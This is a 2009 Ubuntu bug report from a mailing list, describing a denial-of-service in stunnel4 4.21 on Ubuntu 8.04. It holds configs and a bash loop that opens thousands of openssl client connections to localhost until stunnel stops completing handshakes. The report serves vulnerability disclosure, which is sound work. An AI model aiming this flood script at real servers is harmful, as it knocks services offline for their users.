[Bug 327222] [NEW] Simple stunnel DOS when opening and closing connections

Roman Fiedler roman.fiedler at arcsmed.at
Mon Feb 9 15:36:55 UTC 2009 

Public bug reported:

Binary package hint: stunnel4

Usually the stunnel4 process main process with lowest IP consumes 100%
of CPU, TCP connections are accepted, but SSL handshake is not started.
The test scenario below will make 10000 tests, but usually the test can
be suspended after 500-1000 tests, stunnel is broken by then.

stunnel4 on hardy x86:
Description:    Ubuntu 8.04.2
Release:        8.04

# apt-cache policy stunnel4
stunnel4:
  Installed: 3:4.21-1
  Candidate: 3:4.21-1
  Version table:
 *** 3:4.21-1 0
        500 http://security.ubuntu.com hardy/universe Packages
        100 /var/lib/dpkg/status


# stunnel4 -version
stunnel 4.21 on i486-pc-linux-gnu with OpenSSL 0.9.8g 19 Oct 2007
Threading:PTHREAD SSL:ENGINE Sockets:POLL,IPv6 Auth:LIBWRAP

Global options
debug           = 5
pid             = /var/run/stunnel4.pid
RNDbytes        = 64
RNDfile         = /dev/urandom
RNDoverwrite    = yes
 
Service-level options
cert            = /etc/stunnel/stunnel.pem
ciphers         = AES:ALL:!aNULL:!eNULL:+RC4:@STRENGTH
key             = /etc/stunnel/stunnel.pem
session         = 300 seconds
sslVersion      = SSLv3 for client, all for server
TIMEOUTbusy     = 300 seconds
TIMEOUTclose    = 60 seconds
TIMEOUTconnect  = 10 seconds
TIMEOUTidle     = 43200 seconds
verify          = none


Test Scenario:

* Generate keys:

openssl req -new -newkey rsa:1024 -nodes -keyout server.key -days 3653 -x509 -out server.cert -subj "/CN=server"
openssl req -new -newkey rsa:1024 -nodes -keyout client.key -days 3653 -x509 -out client.cert -subj "/CN=client"

* Create config:

service = test tunnel
foreground = yes
# Debug warnings only
debug = 4

pid = /home/[username]/tmp/tunnel/tunnel.pid

cert = server.cert
key = server.key
verify = 3

[testany]
accept = 1234
exec = /home/[username]/tmp/tunnel/testcmd.sh
execargs = testcmd.sh
CAfile = client.cert

* Create testcmd.sh script:

#!/bin/bash
cat >> /tmp/dump

* Start tunnel in one shell

stunnel4 tunnel.cfg

* Start testscript in other:

#!/bin/bash
procCount=0
while [ "${procCount}" != "10000" ] ; do
  openssl s_client -key client.key -cert client.cert -connect localhost:1234 < /dev/null > /dev/null 2>&1 &
  let procCount=procCount+1
  if [ "${procCount#*00}" = "" ] ; then
    echo "Test: ${procCount}"
  fi
done
pkill -KILL -f "openssl s_client"

* When dead:

openssl s_client -key client.key -cert client.cert -connect localhost:1234
CONNECTED(00000003)

But no handshake

** Affects: stunnel4 (Ubuntu)
     Importance: Undecided
         Status: New

-- 
Simple stunnel DOS when opening and closing connections
https://bugs.launchpad.net/bugs/327222
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.

-- 
ubuntu-bugs mailing list
ubuntu-bugs at lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

More information about the universe-bugs mailing list